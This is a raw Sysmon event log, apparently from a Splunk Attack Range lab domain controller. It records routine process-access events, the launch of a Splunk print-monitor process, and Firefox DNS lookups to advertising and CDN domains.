AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.880{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:49.879{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.879{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:49.878{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.736{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000018067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.506{59A5CD1D-8E56-6005-2E00-00000000A301}2464217.14.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.862{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.838{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052ad.360yield.com0type: 5 ice.360yield.com;type: 5 eu2-ice.360yield.com;::ffff:52.58.204.249;::ffff:52.58.206.142;::ffff:52.59.77.252;::ffff:18.156.133.101;::ffff:18.194.102.50;::ffff:18.195.103.23;::ffff:35.156.171.204;::ffff:52.58.161.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052e3120.g.akamaiedge.net0104.125.74.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052ad.yieldlab.net0type: 5 yieldlab.net.edgekey.net;type: 5 e3120.g.akamaiedge.net;::ffff:104.125.74.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.415{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net054.194.51.120;34.253.64.195;52.212.152.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.415{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net0::ffff:52.212.152.59;::ffff:54.194.51.120;::ffff:34.253.64.195;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.088{59A5CD1D-945A-6005-3305-00000000A301}7052serving-126397893.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.078{59A5CD1D-945A-6005-3305-00000000A301}7052serving-126397893.us-east-1.elb.amazonaws.com052.206.107.130;3.219.93.236;18.208.241.4;35.171.145.49;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.077{59A5CD1D-945A-6005-3305-00000000A301}7052go1.aniview.com0type: 5 serving-126397893.us-east-1.elb.amazonaws.com;::ffff:35.171.145.49;::ffff:52.206.107.130;::ffff:3.219.93.236;::ffff:18.208.241.4;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.973{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com013.224.195.149;13.224.195.167;13.224.195.228;13.224.195.13;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.972{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com0::ffff:13.224.195.13;::ffff:13.224.195.149;::ffff:13.224.195.167;::ffff:13.224.195.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.788{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-1611167402.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:53.786{59A5CD1D-945A-6005-3305-00000000A301}7052e11385.dscd.akamaiedge.net02a02:26f0:d6:49d::2c79;2a02:26f0:d6:4b5::2c79;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.784{59A5CD1D-945A-6005-3305-00000000A301}7052e11385.dscd.akamaiedge.net0104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-1611167402.us-east-1.elb.amazonaws.com052.45.78.137;52.200.134.48;54.88.105.203;3.234.114.38;34.197.221.162;34.226.149.251;34.237.70.43;35.171.5.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052player.aniview.com0type: 5 wildcard.aniview.com.edgekey.net;type: 5 e11385.dscd.akamaiedge.net;::ffff:104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052tg1.aniview.com0type: 5 wildcard.aniview.com.edgekey.net;type: 5 e11385.dscd.akamaiedge.net;::ffff:104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.782{59A5CD1D-945A-6005-3305-00000000A301}7052track1.aniview.com0type: 5 tracking-1611167402.us-east-1.elb.amazonaws.com;::ffff:35.171.5.130;::ffff:52.45.78.137;::ffff:52.200.134.48;::ffff:54.88.105.203;::ffff:3.234.114.38;::ffff:34.197.221.162;::ffff:34.226.149.251;::ffff:34.237.70.43;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:53.742{59A5CD1D-945A-6005-3305-00000000A301}7052org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.733{59A5CD1D-945A-6005-3305-00000000A301}7052org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com0151.139.240.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.732{59A5CD1D-945A-6005-3305-00000000A301}7052481.hostedprebid.com0type: 5 org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com;::ffff:151.139.240.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.184{59A5CD1D-945A-6005-3305-00000000A301}7052ib.anycast.adnxs.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.183{59A5CD1D-945A-6005-3305-00000000A301}7052ib.anycast.adnxs.com037.252.172.249;37.252.172.250;37.252.173.22;37.252.173.27;37.252.173.38;37.252.172.36;37.252.172.37;37.252.172.38;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.182{59A5CD1D-945A-6005-3305-00000000A301}7052ib.adnxs.com0type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:37.252.172.38;::ffff:37.252.172.249;::ffff:37.252.172.250;::ffff:37.252.173.22;::ffff:37.252.173.27;::ffff:37.252.173.38;::ffff:37.252.172.36;::ffff:37.252.172.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.917{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.915{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net0108.129.22.238;18.203.106.202;34.249.113.204;34.252.138.191;52.16.235.163;52.48.209.167;54.72.218.85;54.220.16.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.914{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net0::ffff:54.220.16.187;::ffff:108.129.22.238;::ffff:18.203.106.202;::ffff:34.249.113.204;::ffff:34.252.138.191;::ffff:52.16.235.163;::ffff:52.48.209.167;::ffff:54.72.218.85;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.697{59A5CD1D-945A-6005-3305-00000000A301}7052te.ip-prod.aws-cbc.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.696{59A5CD1D-945A-6005-3305-00000000A301}7052te.ip-prod.aws-cbc.cloud018.193.155.163;52.58.23.232;18.184.89.128;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.695{59A5CD1D-8E56-6005-2E00-00000000A301}246422.240.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.695{59A5CD1D-945A-6005-3305-00000000A301}7052te.technical-service.net0type: 5 te.ip-prod.aws-cbc.cloud;::ffff:18.184.89.128;::ffff:18.193.155.163;::ffff:52.58.23.232;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.659{59A5CD1D-8E56-6005-2E00-00000000A301}2464111.201.76.104.in-addr.arpa.0type: 12 
a104-76-201-111.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.550{59A5CD1D-8E56-6005-2E00-00000000A301}246449.145.171.35.in-addr.arpa.0type: 12 ec2-35-171-145-49.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.549{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.5.171.35.in-addr.arpa.0type: 12 ec2-35-171-5-130.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.423{59A5CD1D-945A-6005-3305-00000000A301}7052eqx.smartadserver.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.421{59A5CD1D-945A-6005-3305-00000000A301}7052eqx.smartadserver.com0185.86.137.17;185.86.137.32;185.86.137.113;185.86.137.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.420{59A5CD1D-945A-6005-3305-00000000A301}7052www9.smartadserver.com0type: 5 tmk-eqx-geoloc.smartadserver.com;type: 5 2-01-275d-0018.cdx.cedexis.net;type: 5 eqx.smartadserver.com;::ffff:185.86.137.114;::ffff:185.86.137.17;::ffff:185.86.137.32;::ffff:185.86.137.113;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.420{59A5CD1D-945A-6005-3305-00000000A301}7052eu2-ice.360yield.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.419{59A5CD1D-945A-6005-3305-00000000A301}7052e3120.g.akamaiedge.net9501-C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000018099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.418{59A5CD1D-945A-6005-3305-00000000A301}7052eu2-ice.360yield.com052.58.206.142;52.59.77.252;18.156.133.101;18.194.102.50;18.195.103.23;35.156.171.204;52.58.161.11;52.58.204.249;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464143.144.173.69.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.107{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.097{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.096{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.095{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.084{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:56.084{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.078{59A5CD1D-945A-6005-3305-00000000A301}7052ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.077{59A5CD1D-945A-6005-3305-00000000A301}7052ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud035.157.246.167;52.28.203.152;18.156.195.47;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.076{59A5CD1D-945A-6005-3305-00000000A301}7052c2shb.ssp.yahoo.com0type: 5 c2shb.one-mobile-prod.aws.oath.cloud;type: 5 ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud;::ffff:18.156.195.47;::ffff:35.157.246.167;::ffff:52.28.203.152;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.076{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.am5.vip.prod.criteo.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.074{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.am5.vip.prod.criteo.com0178.250.2.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.074{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.criteo.com0type: 5 bidder.am5.vip.prod.criteo.com;::ffff:178.250.2.131;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.072{59A5CD1D-945A-6005-3305-00000000A301}7052ice.360yield.com0type: 5 eu2-ice.360yield.com;::ffff:52.59.77.252;::ffff:18.156.133.101;::ffff:18.194.102.50;::ffff:18.195.103.23;::ffff:35.156.171.204;::ffff:52.58.161.11;::ffff:52.58.204.249;::ffff:52.58.206.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.049{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api-fra02.omnitagjs.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.049{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid22000nf.pubmatic.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.048{59A5CD1D-945A-6005-3305-00000000A301}7052e8037.i.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.047{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid22000nf.pubmatic.com0185.64.189.112;C:\Program Files\Mozilla Firefox\firefox.exe 